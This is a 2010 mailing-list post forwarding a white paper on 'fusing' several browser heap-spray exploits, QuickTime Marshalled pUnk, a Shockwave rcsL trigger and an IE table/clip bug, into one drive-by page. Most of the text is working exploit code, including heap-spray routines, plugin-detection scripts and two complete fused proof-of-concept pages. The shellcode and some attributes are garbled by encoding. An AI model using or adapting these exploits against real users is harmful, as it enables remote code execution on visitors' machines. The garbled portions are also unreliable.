[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] Fwd: Fusion of Exploits - Multiplexing
From: Prashant Uniyal <happyterminator () gmail ! com>
Date: 2010-12-30 9:58:25
Message-ID: AANLkTintAmYE3FVGaXjbOTkSga8Uofd6TTwqjbBo3SSx () mail ! gmail ! com
[Download RAW message or body]
[Attachment #2 (multipart/alternative)]
---------- Forwarded message ----------
From: Prashant Uniyal <happyterminator@gmail.com>
Date: Wed, Dec 29, 2010 at 12:03 PM
Subject: Fusion of Exploits - Multiplexing exploitation
To: submit@offsec.com, submissions@packetstormsecurity.org
Hello!
A white paper on exploitation. Topic: Fusion Of Exploits. Multiplexing
exploitation. Sorry for delay..Reattached
Thanks and Regards
--
Prashant Uniyal
www.hackingethics.wordpress.com
--
Prashant Uniyal
www.hackingethics.wordpress.com
[Attachment #5 (text/html)]
<br><br><div class="gmail_quote">---------- Forwarded message ----------<br>From: <b \
class="gmail_sendername">Prashant Uniyal</b> <span dir="ltr"><<a \
href="mailto:happyterminator@gmail.com">happyterminator@gmail.com</a>></span><br>
Date: Wed, Dec 29, 2010 at 12:03 PM<br>Subject: Fusion of Exploits - Multiplexing \
exploitation<br>To: <a href="mailto:submit@offsec.com">submit@offsec.com</a>, <a \
href="mailto:submissions@packetstormsecurity.org">submissions@packetstormsecurity.org</a><br> \
<br><br>Hello!<br><br><div class="gmail_quote">A white paper on exploitation. Topic: Fusion Of \
Exploits. Multiplexing exploitation. Sorry for delay..Reattached <br><br>Thanks and Regards<br \
clear="all"><font color="#888888">
-- <br>Prashant Uniyal<br><a href="http://www.hackingethics.wordpress.com" \
target="_blank">www.hackingethics.wordpress.com</a><br> </font></div><br><br clear="all"><br>
</div><br><br clear="all"><br>-- <br>Prashant Uniyal<br><a \
href="http://www.hackingethics.wordpress.com" \
target="_blank">www.hackingethics.wordpress.com</a><br>
--0016364ee4042a8bd404989d8f79--
["Fusion of Xploits - Multiplexing exploitation.txt" (text/plain)]
**Fusion of Xploits - Multiplexing \
exploitation**
**RESEARCH TEAM: Legion Of XTRemers, India**
**SPECIAL GREETZ TO: SECFENCE TEAM AND GARAGE 4 \
HACKERS**
The worthiness of a single chance to exploit a specific victim cannot be compared withanything \
else. And a hacker by hook-or-crook will never tend to loose even a little probability of such \
a chance. In such scenarios, normal exploitation strategies fail to cash-up such precious \
chances of exploitation. But, why normal exploitation fail? In kill-all type situation several \
exploits are bundled togather so as to achieve more chances of success of remote code \
execution. But in some cases we cannot infer what vulnerable products are loaded on target \
victim box.So in case of certain type of exploits; which need exclusive resources, one \
non-legitimate contender exploit will cause failure of the eligible exploit. Such a situation \
is mostly faced with heap spray type exploits. Though there are several other types also which \
behave in similar fashion.
In this paper, we'll discus about the fusion of multiple heap spray based exploits in such a \
way that they will execute under same roof (shared resource among them).Some vulnerabilities, \
which gets trigerred by javascript and do not need any extra plugin or activeX component are \
simplest cases to get triggerred in sequence.But in case of fusion of exploits which use \
activeX components or plugins, we have to tackle few problems first before triggering the \
vulnerability.
In this paper I am going to fuse Apple QuickTime Marshalled pUnk exploit and a zeroday of \
Adobe.
Apple QuickTime Marshalled pUnk code:
<script language=javascript>
addr = 354552864; // 0x15220C20 [pUnk]
var obj= '<' + 'object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" \
height="0"'+'>' +'<' + 'PARAM name="_Marshaled_pUnk" value="'+addr+'"' + '/>'
+'<'+'/'+'object>';
document.write(obj);
</script>
And vulnerability trigger for Shockwave player rcsL chunk memory corruption:
<object classid="clsid:233C1507-6A77-46A4-9443-F871F945D258"
codebase="http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab#version�,5,0,593"
ID=shockit width`0 heightC0 VIEWASTEXT>
<param name=src value="exploit.DIR">
<param name=swRemote value="swSaveEnabled='true' swVolume='true' swRestart='true' \
swPausePlay='true' swFastForward='true' swContextMenu='true' "> <param name=swStretchStyle \
value=fill> <param name=PlayerVersion value�>
<PARAM NAME=bgColor VALUE=#FFFFFF>
<embed src="exploit.DIR" bgColor=#FFFFFF width`0 heightC0 swRemote="swSaveEnabled='true' \
swVolume='true' swRestart='true' swPausePlay='true' swFastForward='true' swContextMenu='true' " \
swStretchStyle=fill type="application/x-director" PlayerVersion� \
pluginspage="http://www.macromedia.com/shockwave/download/"></embed> </object>
Note: Shockwave vulnerability needs a file exploit.DIR which is bundled with original exploit. \
Download it from: http://www.exploit-db.com/exploits/15296/
And we'll use the following heap spray code for exploitation of these vulnerabilities:
<script language=javascript>
/*---------- Heap-Spray Circuit ------------*/
var shellcode=unescape('Javascript Unicode Shellcode');
block=unescape("%u0c0c?");
headersize ;
space=headersize+shellcode.length;
while(block.length<space) {
block+=block;
}
suffixBlock=block.substring(0,space);
blk=block.substring(0,block.length-space);
while(blk.length+space<40000) {
blk=blk+blk+suffixBlock;
}
arrBuffer=new Array();
for(var i=0;i<800;i++) {
arrBuffer[i]=blk+shellcode;
}
/*---------- Heap-Spray Circuit end------------*/
</script>
In case of fusion of multiple vulnerability triggers togather, we reduce the race condition \
among them and if first trigger will work properly and the exploitation goes on successfully, \
then the browser normally doesnt trigger the other triggers, because in most cases, the browser \
process silently gets defferred. This will reduce the race condition overhead among exploits.
Typically, the pseudo structure of a fused exploit should be like this:
[Heap Spray]
[1st vulnerability trigger]
[2nd vulnerability trigger]
This will work if 1st vulnerability gets triggerred properly. But will fail if the object \
corresponding to 1st trigger will be absent, in this case, the garbage collector will run and \
the whole spray will vanish before triggering 2nd vulnerability. This situation is undesirable \
and will foil the exploitation attempt even if the 2nd vulnerability was itself capable of \
exploiting the target.
In order to solve this problem, before triggering the vulnerability we must ensure that its \
correspondingcomponent is present in the target browser. So now, the above proposed fused \
exploit pseudo structure should be like this:
variable go1 = false
variable go2 = false
if : [1st component present] -->go1 = true
else if [2nd component present] -->go2 = true
[Heap Spray]
if [go1 == true] --> [1st vulnerability trigger]
else if[go2 == true] --> [2nd vulnerability trigger]
But how to know whether the particular component is present? HTML is a stateless language and \
doesn't help us in providing information whether a particular component is present or not in \
most cases.To overcome this hinderance, we should check by calling the component before the \
spray and then, checking the default values of its properties. In other cases, we should check \
by using the component in a proper way and then getting something processed by it and checking \
the processed output.
In somecases the scripts can tell us whether a particular component is present or not. In case \
of Adobe Shockwave, we can check for example the src value of the shockwave component, if \
shockwave will be installed, then its value will be "" if not specified, and if shockwave will \
not be installed, in that case it's value will be "undefined", we can check it using following \
code:
<object classid="clsid:233C1507-6A77-46A4-9443-F871F945D258" id="shockex" width=0 height=0> \
</object> <script language=javascript>
var a=document.getElementById("shockex");
document.write("shockex.src : "+shockex.src);
</script>
Whereas above technique doesnt work for Apple QuickTime's properties. But Following script can \
detect Apple QuickTime, this script is given on Apple QuickTime's forums:
<script>
var qcheck = false;
</script>
<script LANGUAGE="VBScript">
Set qtObject = CreateObject("QuickTimeCheckObject.QuickTimeCheck. 1")
If IsObject(qtObject) Then
If qtObject.IsQuickTimeAvailable(0) Then
qcheck = true
End If
End If
</script>
<script>
document.write("<BR>quicktime : "+qcheck);
</script>
We can use these scriptlets to decide which vulnerabilities should be triggerred.
By combining all these techniques, we can now construct the fusion exploit:
<!---Fusion Exploit --->
<!---*** Limit on vulnerability triggers : No Limit
Developer : "vinnu"
***--->
<html>
<head><title>Fusion Exploit POC </title></head>
<body>
<script>
var qcheck = false;
var scheck = false;
</script>
<!--------- Component detection circuit --------->
<object classid="clsid:233C1507-6A77-46A4-9443-F871F945D258" id="shockex" width=0 height=0> \
</object> <script language=javascript>
var a=document.getElementById("shockex");
if (a.src=="")scheck=true;
</script>
<script LANGUAGE="VBScript">
Set qtObject = CreateObject("QuickTimeCheckObject.QuickTimeCheck. 1")
If IsObject(qtObject) Then
If qtObject.IsQuickTimeAvailable(0) Then
qcheck = true
End If
End If
</script>
<script language=javascript>
document.write("<BR>quicktime : "+qcheck);
document.write("<BR>shockex.src : "+shockex.src);
document.write("<BR>Shockwave : "+scheck);
</script>
<!--------- Component detection circuit end --------->
<script language=javascript>
/*------ 1st vulnerable component --------*/
addr = 202116108;// 0x0C0C0C0C [pUnk]
var obj= '<' + 'object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" \
height="0"'+'>' +'<' + 'PARAM name="_Marshaled_pUnk" value="'+addr+'"' + '/>'
+'<'+'/'+'object>';
/*------ 1st vulnerable component end --------*/
/*------ 2nd vulnerable component --------*/
sobj = '<object classid="clsid:233C1507-6A77-46A4-9443-F871F945D258"'
+ '\n codebase="http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab#version�,5,0,593"'
+ '\n ID=shockit width`0 heightC0 VIEWASTEXT>'
+ '\n<param name=src value="exploit.DIR">'
+ '\n<param name=swRemote value="swSaveEnabled=\'true\' swVolume=\'true\' swRestart=\'true\' \
swPausePlay=\'true\' swFastForward=\'true\' swContextMenu=\'true\' ">' + '\n<param \
name=swStretchStyle value=fill>' + '\n<param name=PlayerVersion value�>'
+ '\n<PARAM NAME=bgColor VALUE=#FFFFFF> '
+ '\n<embed src="exploit.DIR" bgColor=#FFFFFF width`0 heightC0 swRemote="swSaveEnabled=\'true\' \
swVolume=\'true\' swRestart=\'true\' swPausePlay=\'true\' swFastForward=\'true\' \
swContextMenu=\'true\' " swStretchStyle=fill' + '\n type="application/x-director" \
PlayerVersion� pluginspage="http://www.macromedia.com/shockwave/download/"></embed>' + \
'\n</object>'; /*------ 2nd vulnerable component end --------*/
</script>
<script>
/*---------- Heap-Spray Circuit ------------*/
/*--- executes calc.exe shellcode ---*/
var i = 0,alimit = 800,slimit = 0x40000, uagent = navigator.userAgent;
var arrBuffer=new Array();
if(uagent.indexOf("MSIE 6.0")>=0) {
alimit = 500;
slimit = 0x24000;
}
var shellcode=unescape('???????????"?????????????????? \
??????????°??????????????????????????????????????? ????????????????????????????????????'); \
block=unescape("??"); headersize ;space=headersize+shellcode.length;
while(block.length<space) {
block+=block;
}
suffixBlock=block.substring(0,space);
blk=block.substring(0,block.length-space);
while(blk.length+space<slimit) {
blk=blk+blk+suffixBlock;
}
for(i=0;i<alimit;i++) {
arrBuffer[i]=blk+shellcode;
}
/*---------- Heap-Spray Circuit end------------*/
</script>
<script>
/*---------vulnerability trigger circuit--------------*/
if (qcheck == true)document.write(obj); /*---- 1st vulnerability trigger ----*/
else if (scheck == true)document.write(sobj); /*---- 2nd vulnerability trigger ----*/
/*-------vulnerability trigger circuit end------------*/
</script>
</body>
</html>
</--- Fusion Exploit End --->
<----------------------------------->
Spraying Spare Spray: In some cases the different exploits may need varying ammount of heap \
sprays. The best results can only be achieved if low ammount spray vulnerabilities triggerred \
first in increasing order of required ammount of spray. For examples a new zeroday of IE that \
requires high ammount of heap spray can also be fused with above exploit poc.
Following is the trigger of new IE vulnerability for IE 6,7,8:
document.write("<table style=position:absolute;clip:rect(0)>");
But it needs more ammount of spray, so we can spray a little more just before triggering it. \
Following code will do enough spray for successfull code execution:
<script language=javascript>
for(;i<1500;i++) {
arrBuffer[i]=blk+shellcode;
}
</script>
And the code that needs to be implanted into above POC is:
<script language=javascript>
for(;i<1500;i++) {
arrBuffer[i]=blk+shellcode;
}
document.write("<table style=position:absolute;clip:rect(0)>");
</script>
Now the Fusion exploit POC after including IE exploit too it becomes:
<!---Fusion Exploit --->
<!---*** Limit on vulnerability triggers : No Limit
Developer : "vinnu"
***--->
<html>
<head><title>Fusion Exploit POC </title></head>
<body>
<script>
var qcheck = false;
var scheck = false;
</script>
<!--------- Component detection circuit --------->
<object classid="clsid:233C1507-6A77-46A4-9443-F871F945D258" id="shockex" width=0 height=0> \
</object> <script language=javascript>
var a=document.getElementById("shockex");
if (a.src=="")scheck=true;
</script>
<script LANGUAGE="VBScript">
Set qtObject = CreateObject("QuickTimeCheckObject.QuickTimeCheck. 1")
If IsObject(qtObject) Then
If qtObject.IsQuickTimeAvailable(0) Then
qcheck = true
End If
End If
</script>
<script language=javascript>
document.write("<BR>quicktime : "+qcheck);
document.write("<BR>shockex.src : "+shockex.src);
document.write("<BR>Shockwave : "+scheck);
</script>
<!--------- Component detection circuit end --------->
<script language=javascript>
/*------ 1st vulnerable component --------*/
addr = 202116108;// 0x0C0C0C0C [pUnk]
var obj= '<' + 'object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" \
height="0"'+'>' +'<' + 'PARAM name="_Marshaled_pUnk" value="'+addr+'"' + '/>'
+'<'+'/'+'object>';
/*------ 1st vulnerable component end --------*/
/*------ 2nd vulnerable component --------*/
sobj = '<object classid="clsid:233C1507-6A77-46A4-9443-F871F945D258"'
+ '\n codebase="http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab#version�,5,0,593"'
+ '\n ID=shockit width`0 heightC0 VIEWASTEXT>'
+ '\n<param name=src value="exploit.DIR">'
+ '\n<param name=swRemote value="swSaveEnabled=\'true\' swVolume=\'true\' swRestart=\'true\' \
swPausePlay=\'true\' swFastForward=\'true\' swContextMenu=\'true\' ">' + '\n<param \
name=swStretchStyle value=fill>' + '\n<param name=PlayerVersion value�>'
+ '\n<PARAM NAME=bgColor VALUE=#FFFFFF> '
+ '\n<embed src="exploit.DIR" bgColor=#FFFFFF width`0 heightC0 swRemote="swSaveEnabled=\'true\' \
swVolume=\'true\' swRestart=\'true\' swPausePlay=\'true\' swFastForward=\'true\' \
swContextMenu=\'true\' " swStretchStyle=fill' + '\n type="application/x-director" \
PlayerVersion� pluginspage="http://www.macromedia.com/shockwave/download/"></embed>' + \
'\n</object>'; /*------ 2nd vulnerable component end --------*/
</script>
<script>
/*---------- Heap-Spray Circuit ------------*/
/*--- executes calc.exe shellcode ---*/
var i = 0,alimit = 800,slimit = 0x40000, uagent = navigator.userAgent;
var arrBuffer=new Array();
if(uagent.indexOf("MSIE 6.0")>=0) {
alimit = 500;
slimit = 0x24000;
}
var shellcode=unescape('%u9090??????????"????????????? \
???????????????°?????????????????????????????????? ?????????????????????????????????????????'); \
block=unescape("??"); headersize ;space=headersize+shellcode.length;
while(block.length<space) {
block+=block;
}
suffixBlock=block.substring(0,space);
blk=block.substring(0,block.length-space);
while(blk.length+space<slimit) {
blk=blk+blk+suffixBlock;
}
for(i=0;i<alimit;i++) {
arrBuffer[i]=blk+shellcode;
}
/*---------- Heap-Spray Circuit end------------*/
</script>
<script>
/*---------vulnerability trigger circuit--------------*/
if (qcheck == true)document.write(obj); /*---- 1st vulnerability trigger ----*/
else if (scheck == true)document.write(sobj); /*---- 2nd vulnerability trigger ----*/
/*-------vulnerability trigger circuit end------------*/
</script>
<script>
/*------------IE exploit--------------*/
// Tested on IE 6, If will fail in higher,
// just increase a little the spray ammount.
// Doesnt need any component detection code
// as in quicktime or shockwave.
for(;i<1500;i++) {
arrBuffer[i]=blk+shellcode;
}
document.write("<table style=position:absolute;clip:rect(0)>");
/*------------IE exploit end----------*/
</script>
</body>
</html>
</--- Fusion Exploit End --->
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic